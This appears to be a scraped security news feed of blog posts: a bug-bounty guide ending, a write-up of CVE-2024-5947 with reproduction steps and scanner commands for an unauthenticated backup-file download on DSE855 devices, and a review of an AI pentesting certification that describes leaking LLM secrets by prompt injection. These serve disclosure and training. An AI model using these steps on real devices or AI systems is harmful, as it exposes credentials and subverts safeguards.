Vulnerability DatabaseConclusionBug bounty hunting is like a fun treasure hunt for finding security flaws on the web. It’s exciting and can be super rewarding if you play by the rules, keep good notes, and use your tools wisely. Imagine yourself as a superhero saving the day, but instead of a cape, you’ve got a keyboard. Keep your adventures ethical, document your discoveries like a treasure map, and use automation as your trusty sidekick, not your only tool. Happy hunting, and may you find bugs that are as elusive as a needle in a haystack! 🚀💻🔍For further learning and practice:Bug Bounty Tutorials: Hacker101CTF Platforms: Hack The Box, TryHackMeCybersecurity Blogs: The Hacker News, Krebs on SecurityHappy hunting, and may your bug bounty journey be both rewarding and educational!Thank you for reading, and happy hunting! 🚀💻🔍— SubhamHow to Get Started in Bug Bounty Hunting: A Comprehensive Beginner’s Guide was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2024-09-01 19:11:45
The Discovery of CVE-2024–5947: Authentication Bypass in Deep Sea Electronics DSE855Recently, during a routine security assessment, I uncovered a significant flaw in the Deep Sea Electronics DSE855 device. This vulnerability, identified as CVE-2024–5947, pertains to an authentication bypass issue that allows unauthorized access to sensitive information. Here’s how I discovered and explored this vulnerability.The DiscoveryWhile examining the target, I focused on the device’s web-based interface and noticed a peculiar behavior. The Deep Sea Electronics DSE855 was exposing a configuration backup file at http://xxxxxxxxxx/Backup.bin. This file was accessible without any authentication, raising red flags.Understanding the VulnerabilityBug Name: Deep Sea Electronics DSE855 — Authentication BypassBug Priority: MediumVulnerable URL: http://xxxxxxx/Backup.binCVE Description:CVE-2024–5947 highlights a critical issue in the Deep Sea Electronics DSE855’s configuration backup process. The vulnerability arises from a lack of authentication before accessing sensitive information stored in the backup file. This issue, documented as ZDI-CAN-22679, allows network-adjacent attackers to retrieve the backup file without proper authorization, potentially exposing sensitive data such as stored credentials.ImpactThe exposed backup file can contain sensitive configuration details that could be leveraged by an attacker to compromise the system further. Accessing this file could lead to unauthorized disclosure of credentials and other critical information, increasing the risk of a security breach.Steps to ReproduceTo confirm the vulnerability, follow these steps:Access the Vulnerable URL: Open the URL in your browser: http://xxxxxxxxx/Backup.binObserve the File Access: If the backup file is accessible without any authentication, you can view or download its contents, confirming the vulnerability.Automating the HuntTo streamline the process, I built a Python tool specifically for detecting this vulnerability. You can install it using pip and automate your testing:ToolPOC: CVE-2024–5947on githubpip install CVE-2024-5947CVE-2024-5947 --chatid <YourTelegramChatID>To Check a Single URL:CVE-2024-5947 -u http://mytargetprogram.comTo Check a List of URLs:CVE-2024-5947 -i urls.txtRemediation:To mitigate this vulnerability, it is essential to remove the .bin file from the server and ensure that sensitive files are protected with proper authentication mechanisms.POC by: @karthithehackerMail: contact@karthithehacker.comWebsite: https://www.karthithehacker.com/If you’re interested in our VAPT service, contact us at ceo@cappriciosec.com or contact@cappriciosec.com.For enrolling my cybersecurity and Bugbounty course,WhatsApp +91 82709 13635.Connect with me:Twitter: https://twitter.com/karthithehackerInstagram: https://www.instagram.com/karthithehacker/LinkedIn: https://www.linkedin.com/in/karthikeyan--v/Website: https://www.karthithehacker.com/Github : https://github.com/karthi-the-hacker/npmjs: https://www.npmjs.com/~karthithehackerYoutube: https://www.youtube.com/@karthi_the_hackerThank youKarthikeyan.VThe Discovery of CVE-2024–5947: Authentication Bypass in Deep Sea Electronics DSE855 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2024-09-01 19:11:40
Certified AI/ML Pentester (C-AI/MLPen) ReviewSkynet better watch out…My hard fought cert…Before this week, I didn’t even know this existed. I have been casually looking around for any way to certify that I have acquired a certain set of skills in hacking generative AI and LLM apps, to no avail.Then, one day I was casually scrolling my LinkedIn feed and I came across this:Certified AI/ML Pentester (C-AI/MLPen) - ReviewLo and behold, The SecOps Group launched this certification back in July! I jumped on it immediately. That 80% discount, on a £250.00 base price ($328.25USD and $66USD when discounted), was too good to pass up. I had to buy a voucher.It’s also notable that you get one free retake and your voucher is for life with each purchase.The Preparation“But Kelvin,” you say, “What type of prep work did you do if you just heard about the certification this week?”Well, I’ve basically spent most of 2024 learning how to:Get LLMs to leak sensitive dataDirectly and indirectly inject malicious instructions within promptsCome up with my own (admittedly a bit outdated now) proof-of-concept attacks on LLMsBut for someone who hasn’t spent the better part of 2024 trying to prevent the takeover of Skynet, where would they go to prepare?Full disclosure, as of this writing (August 30, 2024), The SecOps Group does not offer any formal training for this exam. They offer mock exams for many of their practical pentesting exams, but it wasn’t yet available for the C-AL/MLPen exam before I decided to go for it.(Edit: As of 3rd of Sept, 2024, the mock exam for the C-AI/MLPen is now available.)Thankfully, they don’t leave you hanging, because the promo page tells you everything you need to know:Pictured: No lies.They also link you a whole host of pertinent resources. In my honest opinion, the single best resource is Lakera AI’s Gandalf. However, you will be ill prepared if you don’t read and understand the very many other resources they link, and test various attacks across different LLMs and configurations.If you have the time, inclination, and ability, I’d also recommend engineering your own AI chatbot(s) to test various offensive and defensive techniques. Part of my AI-related studies this year were in engineering various generative AI tools and services to better understand them. I acquired Microsoft’s AI-900 and have even been studying (off-and-on) for the AI-102 exam. I truly believe this has helped me tremendously.If you know how to connect your AI to a database, you know how to access that database, and thus intuitively know how to get it to leak that database…The ExamWhat I like most about this exam is that it’s 100% practical.The C-AI/MLPen is essentially a CTF where you’re given access to 8 different AI models and you take the fictional role of an application pentester tasked with testing each models’ defenses. Each has it’s own unique configuration, and each will require different approaches to coax their corresponding flag. You will be using real exploits and malicious payloads.While there are technically “questions” that you have to answer, the “answers” are the flags you get from getting the different LLMs to divulge their secret, Gandalf-style.When you first buy a voucher you’re given a VPN file to access the exam environment. I had one brief moment where I had to disconnect and reconnect to the VPN to regain access to the exam environment, but otherwise it was very stable.The total exam time is 4 hours and 15 minutes, which is fair for what they’re asking from you. It’s points based, and you need at least a 60% to pass. Essentially, as long as you get 6 of 8 total flags, you have a high chance of passing. I was able to capture 6 flags early but I was unable to get the final couple and eventually my exam time ran out. Thankfully, this was still enough to pass.I should call out that I think I broke one of the AI models to the point that it couldn’t give me the flag even if it wanted to. Without going into too much detail, after a certain point, its output was just… wrong and went well beyond hallucination. While I wasn’t able to retrieve a flag, it was showing me things that I probably shouldn’t have been seeing.I should also call out that even though I said Lakera AI’s Gandalf is the single best resource for exam takers, the exam itself is by no means as easy as Gandalf. The C-AI/MLPen exam is much, much more difficult.For example, I’ve done Gandalf at various times over the past few months, and I have always been able to casually get through the flags without much effort. For C-AI/MLPen, none of my usual exploit attempts worked and I had to dig deep and research furiously to come up with solutions.ConclusionWould I recommend that anyone interested take this exam?Yes!For the price alone, there is very little reason to pass it up. It’s also certainly worth it for the challenge.Probably my only negative, and I’ll admit is a bit nitpicky, is the abbreviation of the certification, C-AI/MLPen. It’s a bit much. I’d honestly recommend that The SecOps Group shortens it to “CAIP” or “CAIPen” if they want to keep their usual naming scheme. As someone with several certifications already, I’m trying to reduce the amount of alphabet soup in my email signature.(Edit: To explain it better, our email and LinkedIn DM signatures are prime real estate. I’m entering mid-career, and I have six IT/cybersecurity certifications right now. I’m a firm believer in only showing five at a time, maximum, but preferably only three or four. So I basically choose which ones I want to advertise with each email and DM I send to people. Each message I send is free advertising for both me (showing off my knowledge/skills) and the cert body (piquing interest in a certification from potential exam takers). The longer the certification’s name, the less likely I’ll want to add it to my signature, and I’m not alone in that sentiment. From a cert body’s perspective, you want as many people showing off your credentials as possible.)Will this certification get your resume passed job candidate ATS or HR managers’ scrutiny? Most likely not. It’s barely a month old, and our industry is slow to widely adopt newer certifications.However, there is precious little competition right now in this space for AI pentesting certifications. As far as I’m aware, this is your only way of certifying your skills, outside of sharing your proof-of-concepts on GitHub or getting CVEs attributed to you. Having this in your back pocket can be a great talking point during an interview.If you’re a web app pentester, AI engineer, or anything IT or cybersecurity-related I feel it would be worth it to give this your time.Thanks for reading!Certified AI/ML Pentester (C-AI/MLPen) Review was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2024-09-01 13:54:00
7 password rules to live by in 2024, according to security expertsHere''s what the experts recommend when you need to create a new password -- and one rule likely goes against what you''re made to do at work.
by ZDNET Security